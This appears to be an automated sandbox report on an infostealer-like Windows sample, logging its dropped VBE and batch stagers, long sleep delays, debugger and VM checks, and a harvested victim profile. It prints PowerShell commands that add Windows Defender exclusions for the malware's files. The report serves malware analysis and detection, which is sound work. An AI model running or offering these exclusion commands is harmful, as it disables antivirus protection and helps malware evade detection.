Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -591234s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -591125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -591015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -590906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -590787s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -590656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -590042s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -589937s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -589827s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -589719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -589604s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -589497s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7544	Thread sleep time: -589389s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 7344	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe TID: 2424	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7548	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_00DCA69B
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_00DDC220

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe

Code function: 0_2_00DDE6A3 VirtualQuery,GetSystemInfo,

0_2_00DDE6A3

Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Thread delayed: delay time: 922337203685477
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 599852
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 598937
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 598672
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 598500
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 598359
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 597891
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 3600000
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 597234
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 597047
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 596781
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 596422
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 300000
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 596281
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 596142
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 595969
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 595052
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 594906
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 594791
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 594687
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 594578
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 594469
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 594219
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 594078
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 593968
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 593859
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 593750
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 593640
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 593531
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 593422
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 593306
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 593172
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 592759
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 592651
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 592461
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 592359
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 592247
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 592137
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 592031
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 591921
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 591800
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 591672
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 591560
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 591453
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 591344
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 591234
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 591125
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 591015
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 590906
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 590787
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 590656
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 590042
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 589937
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 589827
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 589719
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 589604
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 589497
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 589389
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Thread delayed: delay time: 922337203685477

Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: svchost.exe, 0000001C.00000002.3016387106.0000022F80013000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWTSSSP
Source: gkcQYEdJSO.exe, 00000000.00000003.1761230080.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: gkcQYEdJSO.exe, 00000000.00000003.1761230080.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\[
Source: wscript.exe, 00000001.00000003.1996126292.000000000318F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 0000001C.00000002.3016420205.0000022F8002B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.3018101609.0000022F85655000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3059526930.000000001B320000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe

API call chain: ExitProcess graph end node

graph_0-25057

Source: C:\Bridgecontainerserver\BrokerhostNet.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe

Code function: 0_2_00DDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00DDF838

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe

Code function: 0_2_00DE7DEE mov eax, dword ptr fs:[00000030h]

0_2_00DE7DEE

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe

Code function: 0_2_00DEC030 GetProcessHeap,

0_2_00DEC030

Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process token adjusted: Debug
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00DDF838
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DDF9D5 SetUnhandledExceptionFilter,	0_2_00DDF9D5
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DDFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00DDFBCA
Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Code function: 0_2_00DE8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00DE8EBD

Source: C:\Bridgecontainerserver\BrokerhostNet.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe'
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Bridgecontainerserver\BrokerhostNet.exe'
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe'	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Bridgecontainerserver\BrokerhostNet.exe'	Jump to behavior

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Bridgecontainerserver\VBxKsR3W5qREBSxxvIt5VpzoFdFFANtbsRk6NDfKSHeOxN7UsJds5Ck.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Bridgecontainerserver\SlMo.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Bridgecontainerserver\BrokerhostNet.exe "C:\Bridgecontainerserver/BrokerhostNet.exe"	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe'	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Bridgecontainerserver\BrokerhostNet.exe'	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qcUpJGnph9.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe "C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe"

Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002E12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: [{"Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"25","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N"},"5.0.1",5,1,"","user","887849","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\user\\AppData\\Local\\Temp","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
Source: XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe, 00000018.00000002.3019985347.0000000002D89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe

Code function: 0_2_00DDF654 cpuid

0_2_00DDF654

Source: C:\Users\user\Desktop\gkcQYEdJSO.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00DDAF0F

Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Queries volume information: C:\Bridgecontainerserver\BrokerhostNet.exe VolumeInformation	Jump to behavior
Source: C:\Bridgecontainerserver\BrokerhostNet.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
